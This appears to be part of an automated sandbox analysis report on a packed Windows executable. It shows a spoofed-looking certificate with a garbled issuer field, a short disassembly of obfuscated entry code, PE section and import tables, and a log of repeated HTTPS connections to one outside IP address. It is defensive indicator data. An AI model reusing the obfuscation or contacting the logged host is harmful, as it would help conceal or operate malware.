\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021\u2020\xddB\u2020\xddA\u2020\xddA\u2020\xddB\u2020\xddB\u2021\xddA\u2021\xdeB\u2020\xddB\u2020\xddB\u2020\xddB\u2021\xddA\u2021, OU=NOKIA, O=Creted by NOKIA, CN=NOKIA
                                              Version:3
                                              Thumbprint MD5:3B786C577099AADA42900A679BCD26AE
                                              Thumbprint SHA-1:23E29AB0EDFBD4185D27C4417B77C1CA939C9FFB
                                              Thumbprint SHA-256:DCE8873D030ED310AA3856635AC00F9BC77F16625FE0268D5A7B9E4FE04E4160
                                              Serial:5179C6DF2D8D7D4E92B367EAA5073A02
                                              Instruction
                                              push 4E022A2Eh
                                              call 00007F64F0CB3B72h
                                              call 00007F64F1244AE2h
                                              xor dword ptr [esp+eax-0D1B6569h], 00163909h
                                              dec ecx
                                              sub al, byte ptr [esp+eax-0D1B6566h]
                                              xor ecx, 8FAFBAAAh
                                              add eax, 0323EA35h
                                              add eax, 421E02A1h
                                              btc edx, eax
                                              xor ebx, ecx
                                              rol eax, FFFFFFA1h
                                              jno 00007F64F11BE291h
                                              adc ebp, ecx
                                              jmp 00007F64F13942ADh
                                              pop edx
                                              lea edi, dword ptr [edi+edx-56F22FF8h]
                                              sub edx, eax
                                              btr ax, dx
                                              ror dx, 0023h
                                              xor ecx, ebx
                                              sal ax, 0023h
                                              xor edx, eax
                                              inc ecx
                                              sub dl, dh
                                              xor ecx, B0A99AB4h
                                              lea ecx, dword ptr [ecx+edx+3894879Fh]
                                              bswap edx
                                              btc edx, FFFFFF8Fh
                                              imul dl
                                              rol ecx, 1
                                              call 00007F64F1236C0Eh
                                              mov edx, dword ptr [esi]
                                              mov ecx, D98238AAh
                                              mov ecx, dword ptr [esi+04h]
                                              mov eax, D59A0D03h
                                              not edx
                                              btr eax, eax
                                              not ecx
                                              not eax
                                              or edx, ecx
                                              mov dword ptr [eax+esi-2A65F2F8h], edx
                                              lea ecx, dword ptr [eax-0C60434Fh]
                                              xadd eax, ecx
                                              sal ecx, 4Bh
                                              mov edx, dword ptr [ecx+edi-2F97E000h]
                                              ror eax, 2Eh
                                              neg eax
                                              lea edi, dword ptr [edi+ecx*2-5F2FBFFCh]
                                              neg ecx
                                              sbb ecx, eax
                                              btc eax, ecx
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xaec1900xa0.vmp
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc750000x1852e.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x7c12000x7a90.vmp
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xc740000x6b8.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x4cb0000x4c.vmp
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x3eb9b0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x400000x2cff0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x430000x1301c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .vmp0x570000x4739410x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .vmp0x4cb0000x3dc0x400fe91ebc09a70f7caa1aac02044ee16d7False0.0693359375data0.381705562067457IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .vmp0x4cc0000x7a7a300x7a7c00b30da799453fab05c630cf8ac6ae645cunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .reloc0xc740000x6b80x800e91e08893a3695b2ae4dbd4f416fc17bFalse0.43212890625data3.7288848229484293IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .rsrc0xc750000x1852e0x186001c44161d56a6cfa22004d043a64078feFalse0.31452323717948716data3.804103265210808IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0xc751840x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.5082082551594747
                                              RT_ICON0xc7622c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.425
                                              RT_ICON0xc787d40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.37198866320264523
                                              RT_ICON0xc7c9fc0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.27079143499349345
                                              RT_GROUP_ICON0xc8d2240x3edata0.7903225806451613
                                              RT_MANIFEST0xc8d2640x2caXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5028011204481793
                                              DLLImport
                                              KERNEL32.dllExitProcess
                                              ole32.dllCoCreateInstance
                                              OLEAUT32.dllSysAllocString
                                              USER32.dllCloseClipboard
                                              GDI32.dllBitBlt
                                              KERNEL32.dllGetSystemTimeAsFileTime
                                              KERNEL32.dllHeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              TimestampSource PortDest PortSource IPDest IP
                                              May 3, 2024 05:28:19.157761097 CEST49712443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:19.157787085 CEST44349712104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:19.157864094 CEST49712443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:19.161464930 CEST49712443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:19.161483049 CEST44349712104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:19.353570938 CEST44349712104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:19.353708029 CEST49712443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:19.357800007 CEST49712443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:19.357805967 CEST44349712104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:19.358100891 CEST44349712104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:19.411039114 CEST49712443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:19.796228886 CEST49712443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:19.796308041 CEST49712443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:19.796391010 CEST44349712104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.254744053 CEST44349712104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.254849911 CEST44349712104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.254939079 CEST49712443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.256882906 CEST49712443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.256896019 CEST44349712104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.268621922 CEST49713443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.268650055 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.268739939 CEST49713443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.269037962 CEST49713443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.269052982 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.456643105 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.461786985 CEST49713443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.463704109 CEST49713443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.463712931 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.463979959 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.465349913 CEST49713443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.465380907 CEST49713443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.465426922 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.966284990 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.966365099 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.966443062 CEST49713443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.966459036 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.966495991 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.966537952 CEST49713443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.966546059 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.966737032 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.966777086 CEST49713443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.966784000 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.966909885 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.966948032 CEST49713443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.966953993 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.968020916 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.968074083 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.968081951 CEST49713443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.968090057 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.968147993 CEST49713443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.968157053 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.969023943 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.969098091 CEST49713443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.969270945 CEST49713443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.969281912 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:20.969335079 CEST49713443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:20.969338894 CEST44349713104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:21.076961994 CEST49714443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:21.076998949 CEST44349714104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:21.077086926 CEST49714443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:21.077404976 CEST49714443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:21.077416897 CEST44349714104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:21.262741089 CEST44349714104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:21.262824059 CEST49714443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:21.264252901 CEST49714443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:21.264259100 CEST44349714104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:21.264508009 CEST44349714104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:21.265758038 CEST49714443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:21.265964031 CEST49714443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:21.265993118 CEST44349714104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:21.751857996 CEST44349714104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:21.752010107 CEST44349714104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:21.752067089 CEST49714443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:21.752167940 CEST49714443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:21.752186060 CEST44349714104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:21.867439985 CEST49715443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:21.867470026 CEST44349715104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:21.867542028 CEST49715443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:21.867877960 CEST49715443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:21.867892027 CEST44349715104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:22.054986954 CEST44349715104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:22.055073977 CEST49715443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:22.164457083 CEST49715443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:22.164475918 CEST44349715104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:22.164853096 CEST44349715104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:22.207870007 CEST49715443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:22.727112055 CEST49715443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:22.768119097 CEST44349715104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:22.796911001 CEST49715443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:22.796942949 CEST44349715104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:23.297750950 CEST44349715104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:23.297895908 CEST44349715104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:23.297945976 CEST49715443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:23.471764088 CEST49715443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:23.471786976 CEST44349715104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:23.785851002 CEST49717443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:23.785886049 CEST44349717104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:23.785943031 CEST49717443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:23.786565065 CEST49717443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:23.786581993 CEST44349717104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:23.969990015 CEST44349717104.21.53.146192.168.2.6
                                              May 3, 2024 05:28:23.970058918 CEST49717443192.168.2.6104.21.53.146
                                              May 3, 2024 05:28:23.972371101 CEST49717443192.168.2.6104.21.53.146
